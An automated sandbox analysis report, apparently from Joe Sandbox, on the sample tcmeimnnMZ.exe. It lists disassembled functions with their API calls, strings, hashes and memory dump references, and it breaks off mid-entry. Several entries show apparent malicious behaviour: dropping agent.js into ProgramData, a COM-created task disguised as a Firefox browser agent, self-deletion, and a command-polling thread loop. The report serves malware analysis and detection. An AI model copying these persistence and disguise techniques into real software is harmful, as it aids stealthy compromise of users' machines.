String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
API String ID: 1455298312-3639978120
Opcode ID: e3c0df9a064a10922c75df3eae477df509fca300e331a15b8805f9bd28e844d9
Instruction ID: 2d0afe969b29e81556f7f17ee1ec616dedb314d71769ac66ffa258639cc41353
Opcode Fuzzy Hash: e3c0df9a064a10922c75df3eae477df509fca300e331a15b8805f9bd28e844d9
Instruction Fuzzy Hash: E7218C31D04BACDACB01DFA4D925BDDBB72BF15710F10425CE4116B291EB791B45CB90

Function 00E46520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(00E4A104,00000000,00000000,0000003C), ref: 00E46585
GetProcessHeap.KERNEL32(00000008,00000001,00E4A104), ref: 00E465A7
HeapAlloc.KERNEL32(00000000), ref: 00E465AA
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00E46619
HeapAlloc.KERNEL32(00000000), ref: 00E4661C

Strings

xg, xrefs: 00E4668B, 00E4665B
<, xrefs: 00E4653B

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: <$xg
API String ID: 2637570027-1978849559
Opcode ID: 31be9fcda8edcb109495ee523bb6c2154d6a89b04004cb30c4626f4ab596b143
Instruction ID: cb6e0c7c6d22413f1b3ab96019a618b62d7409d98eee56937f6b4f6025dfbeb8
Opcode Fuzzy Hash: 31be9fcda8edcb109495ee523bb6c2154d6a89b04004cb30c4626f4ab596b143
Instruction Fuzzy Hash: 3C51D134A0130A8FDB24CF68E480BAEB7B4FF4A308F2554ADD459EB651DB71D9068752

Function 00624D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00624D87
___except_validate_context_record.LIBVCRUNTIME ref: 00624D8F
_ValidateLocalCookies.LIBCMT ref: 00624E18
__IsNonwritableInCurrentImage.LIBCMT ref: 00624E43
_ValidateLocalCookies.LIBCMT ref: 00624E98

Strings

csm, xrefs: 00624E2D

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 84d8cf827a9e0c63e30eaddee3d0b975ea83f3108a36db73d516c5537a649cf2
Instruction ID: 898d731d76f01d1ea1b57543ed795a20bacdf55c5e6f5d4c0d8d7307c1855f49
Opcode Fuzzy Hash: 84d8cf827a9e0c63e30eaddee3d0b975ea83f3108a36db73d516c5537a649cf2
Instruction Fuzzy Hash: 6841B134A006299BCF10DF68E880ADEBBB7BF45314F158459F9195B392DB31AD15CF90

Function 0062A415 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 0062A480
api-ms-, xrefs: 0062A46C

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 874eb7dcccead4183f2db7830631b5b8de90eb6b15540e146d5b41bcd277a7e3
Instruction ID: 36680959b24030b264a31c8b1b6d9c55b4dff15e77e0abd75f9aff4a8a536785
Opcode Fuzzy Hash: 874eb7dcccead4183f2db7830631b5b8de90eb6b15540e146d5b41bcd277a7e3
Instruction Fuzzy Hash: 09212E31A04A31ABCB21ABA4BD49AAE37D79B01760F114211ED09AB3C1D7F0DC018DE3

Function 0062219E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

operator!=.LIBCPMTD ref: 00622294
task.LIBCPMTD ref: 006222A5
task.LIBCPMTD ref: 006222B4

Strings

oyr, xrefs: 006221F6
lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 006221E5
ianh, xrefs: 006221D1

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2962047866
Opcode ID: fabc52054bc548789c3f11b14a65895c8a345043fd61ab39fcd6a53969e2d94e
Instruction ID: 8a7774d82113852a70a2889343689a1ca4cdf028d812b51cc71f77e015bdb9e8
Opcode Fuzzy Hash: fabc52054bc548789c3f11b14a65895c8a345043fd61ab39fcd6a53969e2d94e
Instruction Fuzzy Hash: 7E315870D04B68DAEB20DFA4D951BDEBBB2AF10704F10419DE10577282DBB91B89CFA1

Function 00629DCE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00629D96: _free.LIBCMT ref: 00629DBB

_free.LIBCMT ref: 00629E1C

Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA

_free.LIBCMT ref: 00629E27
_free.LIBCMT ref: 00629E32
_free.LIBCMT ref: 00629E86
_free.LIBCMT ref: 00629E91
_free.LIBCMT ref: 00629E9C
_free.LIBCMT ref: 00629EA7

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction ID: 76130e69cbac0eee0b97aa0658ec8af5c3f90a205dc0ce95968a587850a7bd36
Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
Instruction Fuzzy Hash: 10118131948F64AAE6B0BBB1EC07FCBB79F5F45700F808C1CB29966052DA35B5445F64

Function 00E47270 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 00E4728A
PathCombineW.SHLWAPI(?,?,agent.js), ref: 00E472A3

Part of subcall function 00E46B10: VariantInit.OLEAUT32(?), ref: 00E46B27
Part of subcall function 00E46B10: CoCreateInstance.OLE32(00E41020,00000000,00000001,00E41000,?), ref: 00E46B44
Part of subcall function 00E46B10: SysAllocString.OLEAUT32(\Mozilla), ref: 00E46B84
Part of subcall function 00E46B10: SysFreeString.OLEAUT32(?), ref: 00E46BBB
Part of subcall function 00E46B10: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 00E46BC8
Part of subcall function 00E46B10: SysFreeString.OLEAUT32(00000000), ref: 00E46BDF

Part of subcall function 00E490C0: GetFileAttributesW.KERNEL32(?,00E472B9), ref: 00E490C1

DeleteFileW.KERNEL32(?), ref: 00E472C4
ExitProcess.KERNEL32 ref: 00E472CC

Strings

agent.js, xrefs: 00E47290
%ProgramData%, xrefs: 00E47285

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
String ID: %ProgramData%$agent.js
API String ID: 1026123424-2175136953
Opcode ID: 0322f161376ba39a673ba3f66e0f9260dec3b5e9427168a4708a865fb934e658
Instruction ID: 9367560e730e90d83b323575d938a862fc33762e808274908c1fbcccc1c08772
Opcode Fuzzy Hash: 0322f161376ba39a673ba3f66e0f9260dec3b5e9427168a4708a865fb934e658
Instruction Fuzzy Hash: 6FF030B540031CAFCB20EBA0EC4DBDA737CAB05305F0005A0B755B21A1EBB09AC98F60

Function 0062BFF8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 0062C040
__fassign.LIBCMT ref: 0062C225
__fassign.LIBCMT ref: 0062C242
WriteFile.KERNEL32(?,0062AD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062C28A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0062C2CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0062C372

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 3b430d186f4921485f99ae55a1407b1df3d8342c0ff84db6dd04d88b08efb0d7
Instruction ID: 6f750621cccb08723db889072f126f033296ceeb0d5c7cd11e3c48de5d8b88f5
Opcode Fuzzy Hash: 3b430d186f4921485f99ae55a1407b1df3d8342c0ff84db6dd04d88b08efb0d7
Instruction Fuzzy Hash: 5CC18F75D046698FCB14CFE8D8809EDBBB6AF09314F28816AE855BB341D6319D46CFA0

Function 00E48184 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E47E16
lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
GetTickCount64.KERNEL32 ref: 00E482EB

Part of subcall function 00E45630: GetProcessHeap.KERNEL32(00000008,00000001,00E47EAE,00000001,00000000), ref: 00E45633
Part of subcall function 00E45630: HeapAlloc.KERNEL32(00000000), ref: 00E4563A

StrToIntA.SHLWAPI(00000000), ref: 00E481E4
StrToIntA.SHLWAPI(?), ref: 00E481ED
CreateThread.KERNEL32(00000000,00000000,Function_000072E0,00000000,00000000,00000000), ref: 00E48201
CloseHandle.KERNEL32(00000000), ref: 00E4820C

Part of subcall function 00E45650: GetProcessHeap.KERNEL32(00000000,00000000,00E48335), ref: 00E45657
Part of subcall function 00E45650: HeapFree.KERNEL32(00000000), ref: 00E4565E

Sleep.KERNEL32(00000000), ref: 00E48346

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: 9f2b674e59245cce3b5f20488bf6b24756fd55e235a5d0224bd4a788c6db9bd7
Instruction ID: a2a8890d3ef0f941f29f251ddc952c4dc3bd6af9b2d7c0effe1fb348fa5ef4e9
Opcode Fuzzy Hash: 9f2b674e59245cce3b5f20488bf6b24756fd55e235a5d0224bd4a788c6db9bd7
Instruction Fuzzy Hash: C8210531E406099BCB24AFB0FC42B6F73B8AF40700F512529E812B7292CF70DD088B99

Function 006250A4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0062509B,00624C89,006243FF), ref: 006250B2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006250C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006250D9
SetLastError.KERNEL32(00000000,0062509B,00624C89,006243FF), ref: 0062512B

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6bbd2cb79dc8d061ba9d69f76334535508d309c56caad740ab51eedbb4406071
Instruction ID: e176753dca03c4f8f1f18c4f10a154f7724143f2f3db09ce046c427de3125914
Opcode Fuzzy Hash: 6bbd2cb79dc8d061ba9d69f76334535508d309c56caad740ab51eedbb4406071
Instruction Fuzzy Hash: 50014C32509F319EEB382774BD8AB962A57EB16374730022EF511862F0EFE54C155EC8

Function 00621BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 00621C63
task.LIBCPMTD ref: 00621C72

Strings

O, xrefs: 00621CA4
ggieqzszmbzlvilbxhiegdimtjzyfwhho, xrefs: 00621C08, 00621C20, 00621C3D

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traits
String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
API String ID: 1455298312-2259853572
Opcode ID: 57e8d045bf86a6b2d6f36258ef6ccb3c4286cff3e198c3ec41d730227fdcce91
Instruction ID: 34eecf5ffb2696d609c7d19da76262092bd5fcacd3d14aefcffba480a453c7b4
Opcode Fuzzy Hash: 57e8d045bf86a6b2d6f36258ef6ccb3c4286cff3e198c3ec41d730227fdcce91
Instruction Fuzzy Hash: AD416D74E08A28DBCB14CFA4E991BEDBBB2BB15304F10412DE412AB380DB785A45CF94

Function 00621FF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 0062204A
task.LIBCPMTD ref: 00622056
task.LIBCPMTD ref: 00622065

Strings

* , xrefs: 00622022
zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads, xrefs: 00622029

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traits
String ID: * $zrkzluimcyldjjcpuredwrursfudljqvoylitrgjifhjbxefdbyeqmrflbddqkjftjavheyivqdszqqujytotdawjlvaheatads
API String ID: 1455298312-2972419988
Opcode ID: 85a6c171e3bc59cd609edfe9d0ac778f6f6bd06876f1f6296e6d1afc5f276f2b
Instruction ID: 1294a5c270d35c955bfc1e328e4bd5095cceba919d15cf62a2d8dde2601d25ba
Opcode Fuzzy Hash: 85a6c171e3bc59cd609edfe9d0ac778f6f6bd06876f1f6296e6d1afc5f276f2b
Instruction Fuzzy Hash: 6C115B71D00A58EACB04DFA4E955BDDF7B5EF08710F00826DE82167291EF391608CB94

Function 00627627 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,006275D9,?,?,006275A1,?,?,?), ref: 0062763C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0062764F
FreeLibrary.KERNEL32(00000000,?,?,006275D9,?,?,006275A1,?,?,?), ref: 00627672

Strings

mscoree.dll, xrefs: 00627635
CorExitProcess, xrefs: 00627647

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e434c0119c7af523b5c7b69887fe933393589e4c3107d25d28e03bff8f8bdf07
Instruction ID: 7d81c06bee5a867cc3fd30172f946c10832e1a8dbd167d007cda3661cf34cfaa
Opcode Fuzzy Hash: e434c0119c7af523b5c7b69887fe933393589e4c3107d25d28e03bff8f8bdf07
Instruction Fuzzy Hash: 7FF08231901A19FBCB159B54DD0AFDD7A7AEF02796F000150E501AA2A0CB748E00DED0

Function 00629D2D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00629D45

Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA

_free.LIBCMT ref: 00629D57
_free.LIBCMT ref: 00629D69
_free.LIBCMT ref: 00629D7B
_free.LIBCMT ref: 00629D8D

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9982c3a0811fb38fc73ca69a093f2459b29f2df4d5118985393a5a04db7b7336
Instruction ID: 99eebffffbce033fc0522e98e19b2d1234821c7ac64df180549e57082db78312
Opcode Fuzzy Hash: 9982c3a0811fb38fc73ca69a093f2459b29f2df4d5118985393a5a04db7b7336
Instruction Fuzzy Hash: 45F0FF7250CF206B8664EB68F586C9AB3EBAE85710B54AC09F404D7711CA30FC809EB4

Function 00626E05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\tcmeimnnMZ.exe, xrefs: 00626E43, 00626E4A, 00626E7E

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\tcmeimnnMZ.exe
API String ID: 0-1100257147
Opcode ID: 478df39ad37c6740a96ac578290ff891cf3a303cf2d0cec95c062bf09fa7f8ad
Instruction ID: 1c8e4522fb5bcd1ec17fbfe07366883c3294157c0e17d6b7e029f063c97c5c98
Opcode Fuzzy Hash: 478df39ad37c6740a96ac578290ff891cf3a303cf2d0cec95c062bf09fa7f8ad
Instruction Fuzzy Hash: AF31B171A04A65AFCB21DF99ED85DDEBBBAEB85700B11006AF400E7350D7B09E40CFA0

Function 006261B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00626163,00000000,?,00638D08,?,?,?,00626306,00000004,InitializeCriticalSectionEx,00631C98,InitializeCriticalSectionEx), ref: 006261BF
GetLastError.KERNEL32(?,00626163,00000000,?,00638D08,?,?,?,00626306,00000004,InitializeCriticalSectionEx,00631C98,InitializeCriticalSectionEx,00000000,?,006260BD), ref: 006261C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006261F1

Strings

api-ms-, xrefs: 006261D6

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 0e35fab2a06b2459f9fbebaf33530eb555b07dd7fdeb1ad0a8b80d96fe9230c1
Instruction ID: 222ff75049ca2f8a2a93b95239a875e218cc86168c6c1171c38688b0b1bc13e8
Opcode Fuzzy Hash: 0e35fab2a06b2459f9fbebaf33530eb555b07dd7fdeb1ad0a8b80d96fe9230c1
Instruction Fuzzy Hash: FEE01A34284709B6EB202B60ED0AB993A5B9B01B40F104430FA0DEC1E2DB65E9A19AD5

Function 00625184 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0062524B
___AdjustPointer.LIBCMT ref: 0062526E
___AdjustPointer.LIBCMT ref: 0062530A

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: add17bf5a23a13847e2a29eb88c833741e89b7527efac4ac538a4d14fbef3c11
Instruction ID: 66c9b6897cc5892590539e64e336b4c19f7c3bb5a186df5da33ba0c63eb2dc98
Opcode Fuzzy Hash: add17bf5a23a13847e2a29eb88c833741e89b7527efac4ac538a4d14fbef3c11
Instruction Fuzzy Hash: F2518E72602E22EFDB399F54E845BAA77A6EF54310F24412DE803562D1E731AE51CF90

Function 0062832A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0062C440,?,00000001,0062AD76,?,0062C8FA,00000001,?,?,?,0062AD05,?,?), ref: 0062832F
_free.LIBCMT ref: 0062838C
_free.LIBCMT ref: 006283C2
SetLastError.KERNEL32(00000000,00000005,000000FF,?,0062C8FA,00000001,?,?,?,0062AD05,?,?,?,00637520,0000002C,0062AD76), ref: 006283CD

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 0c3898e7da78fb2c8de14add3ec97ff90dda4321a0875b03f9acdc3de689b001
Instruction ID: 58bed0e66c4fcc0edc28d1a336064808b821796374b6a75ed4b75bf9ed836514
